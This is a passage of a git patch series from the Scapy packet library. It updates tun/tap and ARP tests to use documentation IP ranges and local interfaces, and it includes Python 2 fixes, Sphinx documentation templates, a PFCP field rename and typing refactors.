"1.2.3.4"} + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"} ) t_sniff.start() = Run a bridge_and_sniff thread between the tuns **sockets** -* It will terminate when 5 IP packets from 1.2.3.4 have been forwarded. +* It will terminate when 5 IP packets from 192.0.2.1 have been forwarded. t_bridge = Thread(target=bridge_and_sniff, args=(tun0, tun1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": lambda pkt: pkt, - "lfilter": lambda p: IP in p and p[IP].src == "1.2.3.4"}) + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}) t_bridge.start() -= Send five IP packets from 1.2.3.4 to the tun0 **interface** += Send five IP packets from 192.0.2.1 to the tun0 **interface** time.sleep(1) -conf.route.add(net="1.2.3.4/32", dev="tun0") -send(IP(src="1.2.3.4", dst="1.2.3.4") / ICMP(), count=5) -conf.route.delt(net="1.2.3.4/32", dev="tun0") +conf.route.add(net="192.0.2.2/32", dev="tun0") +send([IP(src="192.0.2.1", dst="192.0.2.2") / ICMP()], count=5, iface="tun0") +conf.route.delt(net="192.0.2.2/32", dev="tun0") = Wait for the threads -t_bridge.join() -t_sniff.join() +t_bridge.join(5) +t_sniff.join(5) +assert not t_bridge.is_alive() +assert not t_sniff.is_alive() = Run a sniff thread on the tun1 **interface** -* It will terminate when 5 IP packets from 2.3.4.5 have been sniffed +* It will terminate when 5 IP packets from 198.51.100.1 have been sniffed t_sniff = Thread( target=sniff, kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "2.3.4.5"} + "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"} ) t_sniff.start() = Run a bridge_and_sniff thread between the tuns **sockets** -* It will "NAT" packets from 1.2.3.4 to 2.3.4.5 and will terminate when 5 IP packets have been forwarded +* It will "NAT" packets from 192.0.2.1 to 198.51.100.1 and will terminate when 5 IP packets have been forwarded def nat_1_2(pkt): - if IP in pkt and pkt[IP].src == "1.2.3.4": - pkt[IP].src = "2.3.4.5" + if IP in pkt and pkt[IP].src == "192.0.2.1": + pkt[IP].src = "198.51.100.1" del pkt[IP].chksum return pkt return False @@ -157,18 +171,20 @@ def nat_1_2(pkt): t_bridge = Thread(target=bridge_and_sniff, args=(tun0, tun1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": nat_1_2, - "lfilter": lambda p: IP in p and p[IP].src == "1.2.3.4"}) + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}) t_bridge.start() -= Send five IP packets from 1.2.3.4 to the tun0 **interface** += Send five IP packets from 192.0.2.1 to the tun0 **interface** time.sleep(1) -conf.route.add(net="1.2.3.4/32", dev="tun0") -send(IP(src="1.2.3.4", dst="1.2.3.4") / ICMP(), count=5) -conf.route.delt(net="1.2.3.4/32", dev="tun0") +conf.route.add(net="192.0.2.2/32", dev="tun0") +send([IP(src="192.0.2.1", dst="192.0.2.2") / ICMP()], count=5, iface="tun0") +conf.route.delt(net="192.0.2.2/32", dev="tun0") = Wait for the threads -t_bridge.join() -t_sniff.join() +t_bridge.join(5) +t_sniff.join(5) +assert not t_bridge.is_alive() +assert not t_sniff.is_alive() = Delete the tun interfaces if conf.use_pypy: @@ -226,9 +242,9 @@ with VEthPair('a_0', 'a_1') as veth_0: ############ + Test arpleak() using a tap socket -~ tap linux tcpdump +~ tap tcpdump -= Create two tap interfaces += Create a tap interface import mock import struct @@ -243,10 +259,11 @@ if LINUX: else: assert subprocess.check_call(["ifconfig", "tap0", "up"]) == 0 += Check for arpleak def answer_arp_leak(pkt): mymac = b"\x00\x01\x02\x03\x04\x06" - myip = b"\x01\x02\x03\x02" + myip = b"\xc0\x00\x02\x02" # 192.0.2.2 if not ARP in pkt: return e_src = pkt.src @@ -282,10 +299,10 @@ t_answer.start() @mock.patch("scapy.layers.l2.get_if_addr") @mock.patch("scapy.layers.l2.get_if_hwaddr") def test_arpleak(mock_get_if_hwaddr, mock_get_if_addr, hwlen=255, plen=255): - conf.route.ifadd("tap0", "1.2.3.0/24") - mock_get_if_addr.side_effect = lambda _: "1.2.3.1" + conf.route.ifadd("tap0", "192.0.2.0/24") + mock_get_if_addr.side_effect = lambda _: "192.0.2.1" mock_get_if_hwaddr.side_effect = lambda _: "00:01:02:03:04:05" - return arpleak("1.2.3.2/31", timeout=2, hwlen=hwlen, plen=plen) + return arpleak("192.0.2.2/31", timeout=2, hwlen=hwlen, plen=plen) time.sleep(2) diff --git a/test/tuntap.uts b/test/tuntap.uts new file mode 100644 index 00000000000..ca432d75eb2 --- /dev/null +++ b/test/tuntap.uts @@ -0,0 +1,250 @@ +% tuntap tests for Scapy + +# Packet capture-based tests are in sendsniff.uts + +####### ++ Test Linux-specific protocol headers for TunTap +~ linux tun + += Linux-specific protocol headers + +p = LinuxTunPacketInfo()/IP() +assert p.type == 2048 + +p = LinuxTunPacketInfo(raw(p)) +assert p.type == 2048 +assert isinstance(p.payload, IP) + +p = LinuxTunPacketInfo()/IPv6() +assert p.type == 0x86dd + +p = LinuxTunPacketInfo(raw(p)) +assert p.type == 0x86dd + +assert isinstance(p.payload, IPv6) + +####### ++ Test tun device + +~ tun netaccess + += Create a tun interface + +import subprocess +from threading import Thread + +tun0 = TunTapInterface("tun0", strip_packet_info=False) + +if LINUX: + assert subprocess.check_call(["ip", "link", "set", "tun0", "up"]) == 0 + assert subprocess.check_call([ + "ip", "addr", "change", + "192.0.2.1", "peer", "192.0.2.2", "dev", "tun0"]) == 0 +elif BSD: + assert subprocess.check_call(["ifconfig", "tun0", "up"]) == 0 + assert subprocess.check_call([ + "ifconfig", "tun0", "192.0.2.1", "192.0.2.2"]) == 0 +else: + raise NotImplementedError() + += Setup ICMPEcho_am on the interface + +am = tun0.am(ICMPEcho_am, count=3) +am.defoptsniff['timeout'] = 5 +t_am = Thread(target=am) +t_am.start() +time.sleep(1) + += Send ping packets from OS into scapy + +# ping returns non-zero exit code on 100% packet loss +assert subprocess.check_call(["ping", "-c3", "192.0.2.2"]) == 0 + += Cleanup + +t_am.join() + +tun0.close() +if not conf.use_pypy: + # See https://pypy.readthedocs.io/en/latest/cpython_differences.html + del tun0 + +####### ++ Test strip_packet_info=False on Linux + +~ tun linux netaccess + += Create a tun interface + +if not LINUX: + raise NotImplementedError() + +import subprocess + +tun0 = TunTapInterface("tun0", strip_packet_info=False) + +assert subprocess.check_call(["ip", "link", "set", "tun0", "up"]) == 0 +assert subprocess.check_call([ + "ip", "addr", "change", + "192.0.2.1", "peer", "192.0.2.2", "dev", "tun0"]) == 0 + += Send ping packets from Linux into Scapy + +t = AsyncSniffer(opened_socket=tun0) +t.start() + +# We expect this to return exit code 1, because there's nothing in Scapy that +# responds to these packets. +assert subprocess.call(["ping", "-c3", "192.0.2.2"]) == 1 + +time.sleep(1) +t.stop() + +assert len(t.results) >= 3 +icmp4_sequences = set() + +for pkt in t.results: + pkt + assert isinstance(pkt, LinuxTunPacketInfo) + if not isinstance(pkt.payload, IP) or ICMP not in pkt: + # We might get IPv6 router solicitation or other traffic... + continue + if pkt[IP].src != '192.0.2.1' or pkt[IP].dst != '192.0.2.2' or pkt[ICMP].type != 8: + continue + icmp4_sequences.add(pkt.seq) + +# Expect to get 3 different ICMP sequence numbers +assert len(icmp4_sequences) == 3 + += Delete the tun interface +tun0.close() +if not conf.use_pypy: + # See https://pypy.readthedocs.io/en/latest/cpython_differences.html + del tun0 + ++ Test strip_packet_info=True and IPv6 + +~ tun netaccess ipv6 + += Create a tun interface with IPv4 + IPv6 + +import subprocess + +tun0 = TunTapInterface("tun0", strip_packet_info=True) + +if LINUX: + assert subprocess.check_call(["ip", "link", "set", "tun0", "up"]) == 0 + assert subprocess.check_call([ + "ip", "addr", "change", + "192.0.2.1", "peer", "192.0.2.2", "dev", "tun0"]) == 0 + assert subprocess.check_call([ + "ip", "-6", "addr", "add", + "2001:db8::1", "peer", "2001:db8::2", "dev", "tun0"]) == 0 +elif BSD: + assert subprocess.check_call(["ifconfig", "tun0", "up"]) == 0 + assert subprocess.check_call([ + "ifconfig", "tun0", "192.0.2.1", "192.0.2.2"]) == 0 + assert subprocess.check_call([ + "ifconfig", "tun0", "inet6", "2001:db8::1/128", "2001:db8::2"]) == 0 +else: + raise NotImplementedError() + += Send ping packets from OS into Scapy + +t = AsyncSniffer(opened_socket=tun0) +t.start() + +# There's nothing in Scapy that responds, but we expect the packets to be sent +# successfully. Linux and BSD (incl. macOS) have different exit codes. +EXPECTED_EXIT = 1 if LINUX else 2 +assert subprocess.call(["ping", "-c3", "192.0.2.2"]) == EXPECTED_EXIT +assert subprocess.call(["ping6", "-c3", "2001:db8::2"]) == EXPECTED_EXIT + +time.sleep(1) +t.stop() + +assert len(t.results) >= 6 +icmp4_sequences = set() +icmp6_sequences = set() + +for pkt in t.results: + pkt + assert isinstance(pkt, (IP, IPv6)) + if (isinstance(pkt, IP) and + pkt[IP].src == "192.0.2.1" and pkt[IP].dst == "192.0.2.2" and + ICMP in pkt and pkt[ICMP].type == 8): + icmp4_sequences.add(pkt[ICMP].seq) + if (isinstance(pkt, IPv6) and + pkt[IPv6].src == "2001:db8::1" and pkt[IPv6].dst == "2001:db8::2" and + ICMPv6EchoRequest in pkt): + icmp6_sequences.add(pkt[ICMPv6EchoRequest].seq) + +# Expect to get 3 different ICMP sequence numbers +assert len(icmp4_sequences) == 3, ( + "Expected 3 IPv4 ICMP ping packets, got: " + repr(icmp4_sequences)) +assert len(icmp6_sequences) == 3, ( + "Expected 3 IPv6 ICMP ping packets, got: " + repr(icmp6_sequences)) + += Delete the tun interface +tun0.close() +if not conf.use_pypy: + # See https://pypy.readthedocs.io/en/latest/cpython_differences.html + del tun0 + ++ Test tap interfaces + +~ tap netaccess + += Create a tap interface with IPv4 + +import subprocess + +tap0 = TunTapInterface("tap0") + +if LINUX: + assert subprocess.check_call(["ip", "link", "set", "tap0", "up"]) == 0 + assert subprocess.check_call([ + "ip", "addr", "change", "192.0.2.1/30", "dev", "tap0"]) == 0 + assert subprocess.check_call([ + "ip", "neigh", "replace", + "192.0.2.2", "lladdr", "20:00:00:20:00:00", "dev", "tap0"]) == 0 +else: + assert subprocess.check_call(["ifconfig", "tap0", "up"]) == 0 + assert subprocess.check_call([ + "ifconfig", "tap0", "192.0.2.1", "netmask", "255.255.255.252"]) == 0 + assert subprocess.check_call([ + "arp", "-s", "192.0.2.2", "20:00:00:20:00:00", "temp"]) == 0 + += Send ping packets from OS into Scapy + +t = AsyncSniffer(opened_socket=tap0) +t.start() + +# There's nothing in Scapy that responds, but we expect the packets to be sent +# successfully. Linux and BSD (incl. macOS) have different exit codes. +EXPECTED_EXIT = 1 if LINUX else 2 +assert subprocess.call(["ping", "-c3", "192.0.2.2"]) == EXPECTED_EXIT + +time.sleep(1) +t.stop() + +assert len(t.results) >= 3 +icmp4_sequences = set() + +for pkt in t.results: + pkt + assert isinstance(pkt, Ether) + if (IP in pkt and + pkt[IP].src == "192.0.2.1" and pkt[IP].dst == "192.0.2.2" and + ICMP in pkt and pkt[ICMP].type == 8): + icmp4_sequences.add(pkt[ICMP].seq) + +# Expect to get 3 different ICMP sequence numbers +assert len(icmp4_sequences) == 3, ( + "Expected 3 IPv4 ICMP ping packets, got: " + repr(icmp4_sequences)) + += Delete the tap interface +tap0.close() +if not conf.use_pypy: + # See https://pypy.readthedocs.io/en/latest/cpython_differences.html + del tap0 From b458ebc01d31471ad15dfb2230653c7347ec0306 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 14 Nov 2020 00:29:59 +0100 Subject: [PATCH 0392/1632] Python 2 and the dark age of mystical bugs - Vol 1 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Boromir: "What is this new devilry?" [Gandalf does not respond for a moment. He closes his eyes, concentrating. The rumble is heard again.] [Gandalf opens his eyes.] Gandalf: "Python 2 — a demon of the ancient world." [The thing growls, still hidden around a corner of the vast codebase, throwing indescribable bugs. gpotter2's eyes show fear.] Gandalf: "This foe is beyond any of you... Run!" --- scapy/layers/tuntap.py | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index f45a7415ac1..1336a9671bc 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -13,6 +13,7 @@ from __future__ import absolute_import +import os import socket import time from fcntl import ioctl @@ -29,6 +30,8 @@ from scapy.packet import Packet from scapy.supersocket import SimpleSocket +import scapy.modules.six as six + # Linux-specific defines (/usr/include/linux/if_tun.h) LINUX_TUNSETIFF = 0x400454ca LINUX_IFF_TUN = 0x0001 @@ -205,7 +208,13 @@ def recv_raw(self, x=None): x += self.mtu_overhead - r = self.kernel_packet_class, self.ins.read(x), time.time() + if six.PY2: + # For some mystical reason, using self.ins.read ignores + # buffering=0 on python 2.7 and blocks ?! + dat = os.read(self.ins.fileno(), x) + else: + dat = self.ins.read(x) + r = self.kernel_packet_class, dat, time.time() if self.mtu_overhead > 0 and self.strip_packet_info: # Get the packed class of the payload, without triggering a full # decode of the payload data. From 735a1e8a8df4f65e2d6e70d65c934d9368644b83 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 14 Nov 2020 16:18:41 +0100 Subject: [PATCH 0393/1632] Sphinx: use templates & improve generation --- doc/scapy/_ext/scapy_doc.py | 5 ++- doc/scapy/_templates/README.md | 6 +++ doc/scapy/_templates/_dummy | 0 doc/scapy/_templates/module.rst_t | 9 +++++ doc/scapy/_templates/package.rst_t | 55 ++++++++++++++++++++++++++ doc/scapy/conf.py | 2 +- doc/scapy/index.rst | 3 +- doc/scapy/sphinx_apidoc_postprocess.py | 55 -------------------------- setup.py | 2 +- tox.ini | 6 +-- 10 files changed, 79 insertions(+), 64 deletions(-) create mode 100644 doc/scapy/_templates/README.md delete mode 100644 doc/scapy/_templates/_dummy create mode 100644 doc/scapy/_templates/module.rst_t create mode 100644 doc/scapy/_templates/package.rst_t delete mode 100644 doc/scapy/sphinx_apidoc_postprocess.py diff --git a/doc/scapy/_ext/scapy_doc.py b/doc/scapy/_ext/scapy_doc.py index 1202184a2fd..51eb54a705d 100644 --- a/doc/scapy/_ext/scapy_doc.py +++ b/doc/scapy/_ext/scapy_doc.py @@ -59,7 +59,7 @@ def get_fields_desc(obj): ( "**%s**" % fname, class_ref(cls) + ((" " + clsne) if clsne else ""), - "``%s``" % repr(dflt) + "``%s``" % dflt ) ) if output: @@ -127,7 +127,8 @@ def call_parent(): for line in tab(lines): self.add_line(line, sourcename) return - elif self.object_name in ["aliastypes"]: + elif (self.object_name in ["aliastypes"] or + self.object_name.startswith("class_")): # Ignore call_parent() return diff --git a/doc/scapy/_templates/README.md b/doc/scapy/_templates/README.md new file mode 100644 index 00000000000..1c5ee9fd0d6 --- /dev/null +++ b/doc/scapy/_templates/README.md @@ -0,0 +1,6 @@ +# Doc templates + +This folder contains templates used to generate Scapy's doc. It contains: + +- apidoc templates: inherited from + https://github.com/sphinx-doc/sphinx/blob/master/sphinx/templates/apidoc/ diff --git a/doc/scapy/_templates/_dummy b/doc/scapy/_templates/_dummy deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/doc/scapy/_templates/module.rst_t b/doc/scapy/_templates/module.rst_t new file mode 100644 index 00000000000..d9a50e6b975 --- /dev/null +++ b/doc/scapy/_templates/module.rst_t @@ -0,0 +1,9 @@ +{%- if show_headings %} +{{- basename | e | heading }} + +{% endif -%} +.. automodule:: {{ qualname }} +{%- for option in automodule_options %} + :{{ option }}: +{%- endfor %} + diff --git a/doc/scapy/_templates/package.rst_t b/doc/scapy/_templates/package.rst_t new file mode 100644 index 00000000000..0e457d2358c --- /dev/null +++ b/doc/scapy/_templates/package.rst_t @@ -0,0 +1,55 @@ +{%- macro automodule(modname, options) -%} +.. automodule:: {{ modname }} +{%- for option in options %} + :{{ option }}: +{%- endfor %} +{%- endmacro %} + +{%- macro toctree(docnames) -%} +.. toctree:: + :maxdepth: {{ maxdepth }} + :titlesonly: +{% for docname in docnames %} + {{ docname }} +{%- endfor %} +{%- endmacro %} + +{%- if is_namespace %} +{{- [pkgname, "namespace"] | join(" ") | e | heading }} +{% else %} +{%- if pkgname == "scapy" %} +{{- "Scapy API reference" | e | heading }} +{% else %} +{{- [pkgname, "package"] | join(" ") | e | heading }} +{% endif %} +{% endif %} + +{%- if modulefirst and not is_namespace %} +{{ automodule(pkgname, automodule_options) }} +{% endif %} + +{%- if subpackages %} +Subpackages +----------- + +{{ toctree(subpackages) }} +{% endif %} + +{%- if submodules %} +Submodules +---------- +{% if separatemodules %} +{{ toctree(submodules) }} +{%- else %} +{%- for submodule in submodules %} +{% if show_headings %} +{{- [submodule, "module"] | join(" ") | e | heading(2) }} +{% endif %} +{{ automodule(submodule, automodule_options) }} +{% endfor %} +{%- endif %} +{% endif %} + +{%- if not modulefirst and not is_namespace %} +{{ automodule(pkgname, automodule_options) }} +{% endif %} diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 29d3948c799..10b521b6a62 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -28,7 +28,7 @@ # If your documentation needs a minimal Sphinx version, state it here. # -needs_sphinx = '2.2.0' +needs_sphinx = '3.0.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom diff --git a/doc/scapy/index.rst b/doc/scapy/index.rst index 8f8229396fa..6999c73acd7 100644 --- a/doc/scapy/index.rst +++ b/doc/scapy/index.rst @@ -53,7 +53,8 @@ This document is under a `Creative Commons Attribution - Non-Commercial .. only:: html .. toctree:: - :maxdepth: 4 + :maxdepth: 1 + :titlesonly: :caption: API Reference api/scapy.rst diff --git a/doc/scapy/sphinx_apidoc_postprocess.py b/doc/scapy/sphinx_apidoc_postprocess.py deleted file mode 100644 index 0bb37f274fa..00000000000 --- a/doc/scapy/sphinx_apidoc_postprocess.py +++ /dev/null @@ -1,55 +0,0 @@ -# This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license - -""" -Scapy's post process of sphinx-api command -""" - -import glob -import os -import sys - -files = list(glob.iglob('./api/*.rst')) -parents = set( - "%s.rst" % x for x in ( - f.rsplit('.', 1)[0] for f in ( - f[:-4] for f in files - ) - ) if x -) - -for f in files: - # Post process each file - _e = False - with open(f) as fd: - content = fd.readlines() - if f in parents: - # Process "parent files", i.e. with subfiles - # Remove sub categories (better indexation) - for name in ["Subpackages", "Submodules"]: - try: - sub = content.index(name+"\n") - except ValueError: - continue - del content[sub:sub+3] - _e = True - # Custom - if f.endswith("scapy.rst"): - content[0] = "Scapy API reference\n" - content[1] = "=" * (len(content[0]) - 1) + "\n" - for i, line in enumerate(content): - if "toctree" in line: - content[i] = line + " :titlesonly:\n" - _e = True - # File / module file - for name in ["package", "module"]: - if name in content[0]: - content[0] = content[0].replace(" " + name, "") - content[1] = "=" * (len(content[0]) - 1) + "\n" - _e = True - if _e: - print("Post-processed '%s'" % f) - with open(f, "w") as fd: - fd.writelines(content) diff --git a/setup.py b/setup.py index 992adca027b..ad2669bc3dc 100755 --- a/setup.py +++ b/setup.py @@ -56,7 +56,7 @@ def process_ignore_tags(buffer): 'matplotlib' ], 'docs': [ - 'sphinx>=2.2.0', + 'sphinx>=3.0.0', 'sphinx_rtd_theme>=0.4.3', 'tox>=3.0.0' ] diff --git a/tox.ini b/tox.ini index 7b6ef6cc9fb..0dd00ef4439 100644 --- a/tox.ini +++ b/tox.ini @@ -68,16 +68,14 @@ deps = codecov commands = codecov -e TOXENV -# The files listed in thr sphinx-apidoc are ignored -# (past the first argument) +# The files listed past the first argument of the sphinx-apidoc command are ignored [testenv:apitree] description = "Regenerates the API reference doc tree" skip_install = true changedir = doc/scapy deps = sphinx commands = - sphinx-apidoc -f --no-toc --separate --module-first --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/cansocket* ../../scapy/contrib/scada/* ../../scapy/all.py ../../scapy/layers/all.py - python sphinx_apidoc_postprocess.py + sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/cansocket* ../../scapy/contrib/scada/* ../../scapy/all.py ../../scapy/layers/all.py [testenv:mypy] From de493d140afea5294af0cf5ff27661a5149e909d Mon Sep 17 00:00:00 2001 From: Geoff Newson Date: Sat, 14 Nov 2020 16:56:26 +0000 Subject: [PATCH 0394/1632] Renaming duplicate spare field for pfcp (#2899) * Renaming duplicate spare field for pfcp * Fixing pep8 error with line length Co-authored-by: Geoff Newson --- scapy/contrib/pfcp.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/pfcp.py b/scapy/contrib/pfcp.py index 9d6b247b53f..741139e0e2a 100644 --- a/scapy/contrib/pfcp.py +++ b/scapy/contrib/pfcp.py @@ -1812,7 +1812,7 @@ class IE_UserPlaneIPResourceInformation(IE_Base): name = "IE User Plane IP Resource Information" ie_type = 116 fields_desc = IE_Base.fields_desc + [ - XBitField("spare", 0, 1), + XBitField("spare1", 0, 1), BitField("ASSOSI", 0, 1), BitField("ASSONI", 0, 1), BitField("TEIDRI", 0, 3), @@ -1828,7 +1828,9 @@ class IE_UserPlaneIPResourceInformation(IE_Base): x.length - 1 - (1 if x.TEIDRI != 0 else 0) - (x.V4 * 4) - (x.V6 * 16) - x.ASSOSI), lambda x: x.ASSONI == 1), - ConditionalField(XBitField("spare", None, 4), lambda x: x.ASSOSI == 1), + ConditionalField( + XBitField("spare2", None, 4), + lambda x: x.ASSOSI == 1), ConditionalField( BitEnumField("interface", "Access", 4, SourceInterface), lambda x: x.ASSOSI == 1), From 275e029573025891d832da1db16a0efe834627d9 Mon Sep 17 00:00:00 2001 From: Parzival Date: Sat, 14 Nov 2020 22:46:20 +0545 Subject: [PATCH 0395/1632] Fix typo in installation.rst (#2950) --- doc/scapy/installation.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/installation.rst b/doc/scapy/installation.rst index 6a471cc25bc..8145f843a9e 100644 --- a/doc/scapy/installation.rst +++ b/doc/scapy/installation.rst @@ -134,7 +134,7 @@ Here are the topics involved and some examples that you can use to try if your i .. code-block:: python - >>> p=readpcap("myfile.pcap") + >>> p=rdpcap("myfile.pcap") >>> p.conversations(type="jpg", target="> test.jpg") .. note:: From bdae3e3d610a225277929fddb2bb7ec9cb09a272 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 14 Nov 2020 18:38:16 +0100 Subject: [PATCH 0396/1632] Ignore cryptography warnings on python 2.7 --- scapy/error.py | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/scapy/error.py b/scapy/error.py index 0fc1467fb7d..05c40cc32c2 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -15,8 +15,10 @@ import logging import traceback import time +import warnings from scapy.consts import WINDOWS +import scapy.modules.six as six # Typing imports from logging import LogRecord @@ -128,6 +130,17 @@ def format(self, record): # logs when loading Scapy log_loading = logging.getLogger("scapy.loading") +# Apply warnings filters for python 2 +if six.PY2: + try: + with warnings.catch_warnings(): + warnings.simplefilter("ignore") + from cryptography import CryptographyDeprecationWarning + warnings.filterwarnings("ignore", + category=CryptographyDeprecationWarning) + except ImportError: + pass + def warning(x, *args, **kargs): # type: (str, *Any, **Any) -> None From bbaccc8d8af9688ddfb0175cdc14ebbd3eb90e8c Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 15 Nov 2020 17:07:38 +0100 Subject: [PATCH 0397/1632] Lighter MyPy rules for layers --- .config/mypy/mypy.ini | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.config/mypy/mypy.ini b/.config/mypy/mypy.ini index bf7c8a2d3d1..690800fd51b 100644 --- a/.config/mypy/mypy.ini +++ b/.config/mypy/mypy.ini @@ -6,6 +6,11 @@ ignore_errors = True ignore_missing_imports = True +# Layers specific config + +[mypy-scapy.layers.*,mypy-scapy.contribs.*] +warn_return_any = False + # External libraries that we ignore [mypy-IPython] From d3cc5c3a1150284efbfa6fd80e7b0a8a0225d245 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 14 Nov 2020 17:42:04 +0100 Subject: [PATCH 0398/1632] Introduce AnyField type --- scapy/contrib/pnio_rpc.py | 2 +- scapy/fields.py | 65 ++++++++++++++++++++------------------- scapy/packet.py | 37 ++++++++++++++-------- 3 files changed, 58 insertions(+), 46 deletions(-) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index f835473298c..fbe730c2f7a 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -528,7 +528,7 @@ class PadFieldWithLen(PadField): """PadField which handles the i2len function to include padding""" def i2len(self, pkt, val): """get the length of the field, including the padding length""" - fld_len = self._fld.i2len(pkt, val) + fld_len = self.fld.i2len(pkt, val) return fld_len + self.padlen(fld_len) diff --git a/scapy/fields.py b/scapy/fields.py index 76840eeb8ad..f625b0b55de 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -250,7 +250,19 @@ def randval(self): warning("no random class for [%s] (fmt=%s).", self.name, self.fmt) -class Emph(object): +class _FieldContainer(object): + """ + A field that acts as a container for another field + """ + def __getattr__(self, attr): + # type: (str) -> Any + return getattr(self.fld, attr) + + +AnyField = Union[Field[Any, Any], _FieldContainer] + + +class Emph(_FieldContainer): """Empathize sub-layer for display""" __slots__ = ["fld"] @@ -258,10 +270,6 @@ def __init__(self, fld): # type: (Any) -> None self.fld = fld - def __getattr__(self, attr): - # type: (str) -> Any - return getattr(self.fld, attr) - def __eq__(self, other): # type: (Any) -> bool return bool(self.fld == other) @@ -275,26 +283,22 @@ def __ne__(self, other): __hash__ = None # type: ignore -class ActionField(object): - __slots__ = ["_fld", "_action_method", "_privdata"] +class ActionField(_FieldContainer): + __slots__ = ["fld", "_action_method", "_privdata"] def __init__(self, fld, action_method, **kargs): # type: (Field[Any, Any], str, **Any) -> None - self._fld = fld + self.fld = fld self._action_method = action_method self._privdata = kargs def any2i(self, pkt, val): # type: (Optional[Packet], int) -> Any - getattr(pkt, self._action_method)(val, self._fld, **self._privdata) - return getattr(self._fld, "any2i")(pkt, val) - - def __getattr__(self, attr): - # type: (str) -> Any - return getattr(self._fld, attr) + getattr(pkt, self._action_method)(val, self.fld, **self._privdata) + return getattr(self.fld, "any2i")(pkt, val) -class ConditionalField(object): +class ConditionalField(_FieldContainer): __slots__ = ["fld", "cond"] def __init__(self, @@ -328,7 +332,7 @@ def __getattr__(self, attr): return getattr(self.fld, attr) -class MultipleTypeField(object): +class MultipleTypeField(_FieldContainer): """MultipleTypeField are used for fields that can be implemented by various Field subclasses, depending on conditions on the packet. @@ -490,19 +494,20 @@ def register_owner(self, cls): fld.owners.append(cls) self.dflt.owners.append(cls) - def __getattr__(self, attr): - # type: (str) -> Any - return getattr(self._find_fld(), attr) + @property + def fld(self): + # type: () -> Field[Any, Any] + return self._find_fld() -class PadField(object): +class PadField(_FieldContainer): """Add bytes after the proxified field so that it ends at the specified alignment from its beginning""" - __slots__ = ["_fld", "_align", "_padwith"] + __slots__ = ["fld", "_align", "_padwith"] def __init__(self, fld, align, padwith=None): # type: (Field[Any, Any], int, Optional[bytes]) -> None - self._fld = fld + self.fld = fld self._align = align self._padwith = padwith or b"\x00" @@ -515,7 +520,7 @@ def getfield(self, s, # type: bytes ): # type: (...) -> Tuple[bytes, Any] - remain, val = self._fld.getfield(pkt, s) + remain, val = self.fld.getfield(pkt, s) padlen = self.padlen(len(s) - len(remain)) return remain[padlen:], val @@ -525,7 +530,7 @@ def addfield(self, val, # type: Any ): # type: (...) -> bytes - sval = self._fld.addfield(pkt, b"", val) + sval = self.fld.addfield(pkt, b"", val) return s + sval + struct.pack( "%is" % ( self.padlen(len(sval)) @@ -533,10 +538,6 @@ def addfield(self, self._padwith ) - def __getattr__(self, attr): - # type: (str) -> Any - return getattr(self._fld, attr) - class ReversePadField(PadField): """Add bytes BEFORE the proxified field so that it starts at the specified @@ -549,7 +550,7 @@ def getfield(self, # type: (...) -> Tuple[bytes, Any] # We need to get the length that has already been dissected padlen = self.padlen(len(pkt.original) - len(s)) - remain, val = self._fld.getfield(pkt, s[padlen:]) + remain, val = self.fld.getfield(pkt, s[padlen:]) return remain, val def addfield(self, @@ -558,7 +559,7 @@ def addfield(self, val, # type: Any ): # type: (...) -> bytes - sval = self._fld.addfield(pkt, b"", val) + sval = self.fld.addfield(pkt, b"", val) return s + struct.pack("%is" % ( self.padlen(len(s)) ), self._padwith) + sval @@ -1819,8 +1820,8 @@ class FieldListField(Field[List[Any], List[Any]]): def __init__( self, name, # type: str - default, # type: Optional[List[Field[Any, Any]]] - field, # type: Field[Any, Any] + default, # type: Optional[List[AnyField]] + field, # type: AnyField length_from=None, # type: Optional[Callable[[Packet], int]] count_from=None, # type: Optional[Callable[[Packet], int]] ): diff --git a/scapy/packet.py b/scapy/packet.py index 11dbd56f2b3..fea82c30bda 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -23,8 +23,19 @@ import types import warnings -from scapy.fields import StrField, ConditionalField, Emph, PacketListField, \ - BitField, MultiEnumField, EnumField, FlagsField, MultipleTypeField, Field +from scapy.fields import ( + AnyField, + BitField, + ConditionalField, + Emph, + EnumField, + Field, + FlagsField, + MultiEnumField, + MultipleTypeField, + PacketListField, + StrField, +) from scapy.config import conf, _version_checker from scapy.compat import raw, orb, bytes_encode from 